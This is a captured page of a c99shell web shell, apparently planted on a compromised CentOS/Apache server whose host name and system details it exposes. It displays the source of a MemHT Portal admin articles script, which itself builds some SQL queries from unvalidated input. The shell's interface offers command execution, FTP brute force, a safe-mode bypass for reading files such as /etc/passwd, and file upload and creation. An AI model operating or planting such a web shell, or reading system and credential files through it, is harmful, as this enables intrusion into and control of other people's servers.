!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/admin/pages/articles/   drwxr-xr-x
Free 50.92 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (15.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/********************************************************************************
    - MemHT Portal -
    
    Copyright (C) 2007-2008 by Miltenovik Manojlo
    http://www.memht.com
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your opinion) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License along
    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)
    or write to the Free Software Foundation, Inc., 51 Franklin Street,
    Fifth Floor, Boston, MA02110-1301, USA.
        
********************************************************************************/

if (!defined("_LOAD_PAGE_")) {
    die(
"<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");
}

if (isset(
$_GET['op'])) { $op inCode($_GET['op']); } else { $op ""; }
if (isset(
$_GET['id'])) { $id inCode($_GET['id']); } else { $id ""; }
if (isset(
$_GET['ok'])) { $ok inCode($_GET['ok']); } else { $ok false; }
if (isset(
$_POST['argomento'])) { $argomento inCode($_POST['argomento']); } else { $argomento ""; }
if (isset(
$_POST['nome'])) { $nome eregi_replace("[/_']","-",inCode($_POST['nome'])); } else { $nome ""; }
if (isset(
$_POST['descrizione'])) { $descrizione inCode($_POST['descrizione']); } else { $descrizione ""; }
if (isset(
$_POST['testo'])) { $testo inCode($_POST['testo']); } else { $testo ""; }
if (isset(
$_POST['tags'])) { $tags inCode($_POST['tags']); } else { $tags ""; }
if (isset(
$_POST['autore'])) { $autore inCode($_POST['autore']); } else { $autore ""; }
if (isset(
$_POST['enabled'])) { $enabled inCode($_POST['enabled']); } else { $enabled ""; }
$usecomments = (isset($_POST['usecomments'])) ? intval($_POST['usecomments']) : ;
$language = (isset($_POST['language'])) ? intval($_POST['language']) : ;

if (isset(
$_GET['pg'])) { $pg inCode($_GET['pg']); } else { $pg 1; }
$ofsppg 30//Items per page
$ofsbgn = ($pg*$ofsppg)-$ofsppg;

function 
artList($ofsbgn,$ofsppg,$pg) {
    global 
$dblink,$siteConfig;

    
$n 0;
    echo 
"<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>";
    echo 
"<thead>\n";
        echo 
"<tr><td>"._TITLE_."</td><td width='25%'>"._TAGS_."</td><td width='15%'>"._LANGUAGE_."</td><td width='15%'>"._ARGUMENT_."</td><td width='1%'>&nbsp;</td></tr>\n";
    echo 
"</thead>\n";
    echo 
"<tbody>\n";
        
$result $dblink->get_list("SELECT a.*,DATE_FORMAT(a.data, '".$siteConfig['timestamp']."') as data,l.language AS languagetxt FROM memht_articoli AS a LEFT JOIN memht_content_languages AS l ON a.language = l.id ORDER BY a.id DESC LIMIT $ofsbgn,$ofsppg");
        foreach (
$result as $row) {
            
$id intval($row['id']);
            
$argomento intval($row['argomento']);
            
$nome outCode($row['nome']);
            
$testo outCode($row['testo']);
            
$autore outCode($row['autore']);
            
$data $row['data'];
            
$hits intval($row['hits']);
            
$language outCode($row['languagetxt']);
            
$enabled intval($row['enabled']);    
            
            if (
$language=="") { $language _GLOBAL_; }
            
            
$off = ($enabled==1) ? "" "<img src='images/off.gif' alt='"._OFF_."' title='"._OFF_."'>" ;
            
            
$row_nome_arg $dblink->get_row("SELECT nome FROM memht_argomenti WHERE id=$argomento");
            
$nome_arg outCode($row_nome_arg['nome']);    
            
            
$class = (($n++%2)!=0) ? "hlight" "clean" ;
    
            echo 
"<tr><td class='$class'><a href='index.php?page=articles&op=readArticle&id=$id&title=".mem_urlencode($nome)."' title='$nome'><b>$nome</b></a></td><td class='$class' id='info'>\n";
            
            if (
$result $dblink->get_list("SELECT tag FROM memht_tags WHERE whr=1 AND cid=$id ORDER BY tag")) {
                foreach (
$result as $row) {
                    echo 
"<span style='padding: 0 4px;'><a href=\"index.php?page=tags&op=list&tag=".mem_urlencode(outCode($row['tag']))."\" title=\"".outCode($row['tag'])."\" target='_blank'>".outCode($row['tag'])."</a></span>";
                }
            }
            echo 
"</td><td class='$class'>$language</td><td class='$class'>$nome_arg</td><td class='$class' nowrap><a href='admin.php?page=articles&op=editArticle&id=$id' title='"._MODIFY_."'><img src='images/edit.gif' alt='Edit' border='0'></a> <a href='admin.php?page=articles&op=deleteArticle&id=$id' title='"._DELETE_."'><img src='images/delete.gif' alt='Delete' border='0'></a> $off</td></tr>\n";
        }
        if (
$n<=0) {
            echo 
"<tr><td colspan='5' align='center' id='errorText' class='clean'><b>"._NOARTICLES_."</b></td></tr>\n";
        }
    echo 
"</tbody>\n";
    echo 
"</table>";
    
    
//Pages
    
include_once("inc/class/paginationSystem.class.php");
    
$ps = new paginationSystem();
    
$ps->items $ofsppg;
    
$ps->actpg $pg;
    
$ps->query "SELECT id FROM memht_articoli";
    
$ps->url "admin.php?page=articles&op=showArticles&pg={{N}}";
    
$ps->show();
}    

function 
add($argomento,$nome,$descrizione,$testo,$tags,$autore,$usecomments,$language,$enabled,$ok=false) {
    global 
$dblink,$userInfo,$tzNOW;

    if (!
$ok) {
        echo 
"<table width='100%' align='center' cellspacing='0' cellpadding='1'>";
        echo 
"<form name='form_art' method='post' action='admin.php?page=articles&op=addArticle&ok=true'>";
        
            echo 
"<tr><td width='25%'><b>"._TITLE_."</b><td><input type='text' name='nome' size='40' maxlength='255'>\n";
            echo 
"<tr><td><b>"._ARGUMENT_."</b></td><td>\n";
                echo 
"<select name='argomento'>\n";
                    
//Lista argomenti
                    
$result $dblink->get_list("SELECT * FROM memht_argomenti ORDER BY nome");
                    foreach (
$result as $row) {
                        
$aid intval($row['id']);
                        
$nome outCode($row['nome']);

                        echo 
"<option value='$aid'>$nome</option>\n";
                    }
                echo 
"</select>\n";
            echo 
"<tr><td valign='top'><b>"._DESCRIPTION_."</b></td><td>";
                
                
textarea("descrizione","100%","200px",1,"fulladmin");
                
            echo 
"</td></tr><tr><td valign='top'><b>"._TEXT_."</b></td><td><div id='info'>"._PAGEBREAK_."</div>";
                
                
textarea("testo","100%","600px",1,"fulladmin");
                
            echo 
"</td></tr>\n";
            echo 
"<tr><td><b>"._TAGS_."</b></td><td><input type='text' name='tags' size='40' maxlength='255'> <span id='info'>("._SEPARATEDBYCOMMAS_.")</span></td></tr>\n";
            echo 
"<tr><td><b>"._AUTHOR_."</b></td><td><input type='text' name='autore' size='20' maxlength='255'> <span id='info'>("._LEAVE_EMPTY_FOR_DEFAULT_VALUE_.": ".$userInfo['user'].")</span></td></tr>\n";
            echo 
"<tr><td><b>"._LANGUAGE_."</b></td><td>\n";
                echo 
"<select name='language'>\n";
                    echo 
"<option value='0'>"._GLOBAL_."</option>\n";
                    
$result $dblink->get_list("SELECT * FROM memht_content_languages ORDER BY language");
                    foreach (
$result as $row) {
                        
$lid intval($row['id']);
                        
$llanguage outCode($row['language']);
                        
$default intval($row['default']);
                        
                        
$selected = ($default==1) ? " selected" "" ;                        
                        echo 
"<option value='$lid'{$selected}>$llanguage</option>\n";
                    }
                echo 
"</select>\n";
            echo 
"<tr><td><b>"._COMMENTSENABLED_."</b></td><td>";
            echo 
"<select name='usecomments'>\n";
                echo 
"<option value='1' selected>"._YES_."</option>\n";
                echo 
"<option value='0'>"._NO_."</option>\n";
            echo 
"</select></td></tr>\n";
            echo 
"<tr><td><b>"._ENABLED_."</b></td><td>";
            echo 
"<select name='enabled'>\n";
                echo 
"<option value='1' selected>"._YES_."</option>\n";
                echo 
"<option value='0'>"._NO_."</option>\n";
            echo 
"</select>\n";
            echo 
"</td></tr><tr><td colspan='2'><input type='submit' name='Submit' value='"._ADD_."'>\n";

        echo 
"</form>\n";
        echo 
"</table>\n";
    } else {            
        
$save true;
        if (
$nome=="") { $save false$msg _TITLE_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if (
$testo=="") { $save false$msg _TEXT_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if (
$autore=="") { $autore $userInfo['user']; }
    
        if (
$save) {
            if (
memRunHooks('AddArticle',array($nome,$argomento,$descrizione,$testo,$autore,$userInfo['email'],$language))) {
                
$dblink->query("INSERT INTO memht_articoli (id,argomento,nome,descrizione,testo,autore,email,data,usecomments,language,enabled)
                                VALUES (null,'$argomento','$nome','$descrizione','$testo','$autore','"
.$userInfo['email']."',$tzNOW,'$usecomments','$language','$enabled')");
                if (
$tags!="") {
                    
$row $dblink->get_row("SELECT id FROM memht_articoli ORDER BY id DESC LIMIT 1");
                    
$lastid intval($row['id']);
                    
                    
$tags explode(",",$tags);
                    foreach (
$tags as $tag) {
                        
$dblink->query("INSERT INTO memht_tags (tag,cid,whr) VALUES ('".inCode(trim($tag))."','$lastid','1')");
                    }
                }
                
                
memRunHooks('AddArticleEnd',array($nome,$argomento,$descrizione,$testo,$autore,$userInfo['email'],$language));
            }
            echo 
"<meta http-equiv='refresh' content='0;URL=admin.php?page=articles'>";
        } else {
            echo 
"<div align='center' id='errorText'><b>$msg</b></div>";
        }
    }
}

function 
edit($id,$argomento,$nome,$descrizione,$testo,$tags,$autore,$usecomments,$language,$enabled,$ok=false) {
    global 
$dblink,$tzNOW;

    
$id intval($id);

    if (!
$ok) {
        
$row_edit $dblink->get_row("SELECT * FROM memht_articoli WHERE id=$id");
        
$nargomento intval($row_edit['argomento']);
        
$nnome outCode($row_edit['nome']);
        
$ndescrizione outCode($row_edit['descrizione']);
        
$ntesto outCode($row_edit['testo']);
        
$nautore outCode($row_edit['autore']);
        
$nlanguage intval($row_edit['language']);
        
$usecomments intval($row_edit['usecomments']);
        
$nenabled intval($row_edit['enabled']);
        
        if (
$result $dblink->get_list("SELECT tag FROM memht_tags WHERE whr=1 AND cid=$id")) {
            
$ntags = array();
            foreach (
$result as $row) {
                
$ntags[] = outCode($row['tag']);
            }
            
$ntags implode(",",$ntags);
        } else {
            
$ntags "";
        }
    
        echo 
"<table width='100%' align='center' cellspacing='0' cellpadding='1'>";
        echo 
"<form name='form_art' method='post' action='admin.php?page=articles&op=editArticle&id=$id&ok=true'>";
        
            echo 
"<tr><td width='25%'><b>"._TITLE_."</b><td><input type='text' name='nome' size='40' maxlength='255' value=\"$nnome\">\n";
            echo 
"<tr><td><b>"._ARGUMENT_."</b></td><td>\n";
                echo 
"<select name='argomento'>\n";
                    
//Lista argomenti
                    
$result $dblink->get_list("SELECT * FROM memht_argomenti ORDER BY nome");
                    foreach (
$result as $row) {
                        
$aid intval($row['id']);
                        
$nome outCode($row['nome']);
                        if (
$nargomento==$aid) {
                            echo 
"<option value='$aid' selected>$nome</option>\n";
                        } else {
                            echo 
"<option value='$aid'>$nome</option>\n";
                        }
                    }
                echo 
"</select>\n";
            echo 
"<tr><td valign='top'><b>"._DESCRIPTION_."</b></td><td>";
                
textarea("descrizione","100%","200px",1,"fulladmin",$ndescrizione);
            echo 
"</td></tr><tr><td valign='top'><b>"._TEXT_."</b></td><td><div id='info'>"._PAGEBREAK_."</div>";
                
textarea("testo","100%","600px",1,"fulladmin",$ntesto);
            echo 
"</td></tr>\n";
            echo 
"<tr><td><b>"._AUTHOR_."</b></td><td><input type='text' name='autore' value=\"$nautore\" size='40' maxlength='255'></td></tr>\n";
            echo 
"<tr><td><b>"._TAGS_."</b></td><td><input type='text' name='tags' value=\"$ntags\" size='40' maxlength='255'> <span id='info'>("._SEPARATEDBYCOMMAS_.")</span></td></tr>\n";
            echo 
"<tr><td><b>"._LANGUAGE_."</b></td><td>\n";
                echo 
"<select name='language'>\n";
                    
$selected = ($nlanguage==0) ? " selected" "" ;
                    echo 
"<option value='0'{$selected}>"._GLOBAL_."</option>\n";
                    
$result $dblink->get_list("SELECT * FROM memht_content_languages ORDER BY language");
                    foreach (
$result as $row) {
                        
$lid intval($row['id']);
                        
$llanguage outCode($row['language']);
                        
                        
$selected = ($nlanguage==$lid) ? " selected" "" ;
                        echo 
"<option value='$lid'{$selected}>$llanguage</option>\n";
                    }
                echo 
"</select>\n";
            echo 
"<tr><td><b>"._COMMENTSENABLED_."</b></td><td>";
            echo 
"<select name='usecomments'>\n";
                if (
$usecomments==1) {
                    echo 
"<option value='1' selected>"._YES_."</option>\n";
                    echo 
"<option value='0'>"._NO_."</option>\n";
                } else {
                    echo 
"<option value='1'>"._YES_."</option>\n";
                    echo 
"<option value='0' selected>"._NO_."</option>\n";
                }
            echo 
"</select></td></tr>\n";
            echo 
"<tr><td><b>"._ENABLED_."</b></td><td>";
            echo 
"<select name='enabled'>\n";
            if (
$nenabled==1) {
                echo 
"<option value='1' selected>"._YES_."</option>\n";
                echo 
"<option value='0'>"._NO_."</option>\n";
            } else {
                echo 
"<option value='1'>"._YES_."</option>\n";
                echo 
"<option value='0' selected>"._NO_."</option>\n";
            }
                echo 
"</select>\n";
            echo 
"<tr><td colspan='2'><input type='submit' name='Submit' value='"._MODIFY_."'>\n";

        echo 
"</form>\n";
        echo 
"</table>\n";
    } else {    
        
$save true;
        if (
$nome=="") { $save false$msg _TITLE_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if (
$testo=="") { $save false$msg _TEXT_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if (
$autore=="") { $autore $userInfo['user']; }
    
        if (
$save) {
            
$dblink->query("UPDATE memht_articoli SET argomento='$argomento',nome='$nome',testo='$testo',descrizione='$descrizione',autore='$autore',language='$language',usecomments='$usecomments',enabled='$enabled' WHERE id=$id");
            
            
$dblink->query("DELETE FROM memht_tags WHERE whr=1 AND cid=$id");
            if (
$tags!="") {    
                
$tags explode(",",$tags);
                foreach (
$tags as $tag) {
                    
$dblink->query("INSERT INTO memht_tags (tag,cid,whr) VALUES ('".inCode(trim($tag))."','$id','1')");
                }
            }
            
            echo 
"<meta http-equiv='refresh' content='0;URL=admin.php?page=articles'>";
        } else {
            echo 
"<div align='center' id='errorText'><b>$msg</b></div>";
        }
    }
}

function 
delete($id,$ok=false) {
    global 
$dblink;
    
    if (
$ok) {
        
$dblink->query("DELETE FROM memht_articoli WHERE id=$id");
        
$dblink->query("DELETE FROM memht_comments WHERE whr=1 AND wid=$id");
        
$dblink->query("DELETE FROM memht_ratings WHERE whr=1 AND wid=$id");
        
$dblink->query("DELETE FROM memht_tags WHERE whr=1 AND cid=$id");
        echo 
"<meta http-equiv='refresh' content='0;URL=admin.php?page=articles'>";        
    } else {
        echo 
"<div align='center'><b>"._SUREDELETEARTICLE_."</b><br><a href='admin.php?page=articles&op=deleteArticle&id=$id&ok=true' title='"._YES_."'>"._YES_."</a> - <a href='admin.php?page=articles' title='"._NO_."'>"._NO_."</a></div>";
    }
}

require_once(
"admin/inc/inc_header.php");
    
admin_page_title($page);
    
    
openTable();
        echo 
"<div align='center' class='box'>";
            echo 
"<a href='admin.php?page=articles' title='"._LIST_."'><img src='admin/icons/list.png' border='0' title='"._LIST_."' align='top'> "._LIST_."</a>";
            echo 
" - <a href='admin.php?page=articles&op=addArticle' title='"._ADD_."'><img src='admin/icons/add.png' border='0' title='"._ADD_."' align='top'> "._ADD_."</a>";
        echo 
"</div>";
    
closeTable();
    
    
openTable();
    
        switch(
$op) {
            case 
"addArticle":
                
add($argomento,$nome,$descrizione,$testo,$tags,$autore,$usecomments,$language,$enabled,$ok);
            break;
            
            case 
"deleteArticle":
                
delete($id,$ok);
            break;
            
            case 
"editArticle":
                
edit($id,$argomento,$nome,$descrizione,$testo,$tags,$autore,$usecomments,$language,$enabled,$ok);
            break;
            
            case 
"showArticles":            
            default:
                
artList($ofsbgn,$ofsppg,$pg);
            break;
        }
    
    
closeTable();
require_once(
"admin/inc/inc_footer.php");

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0165 ]--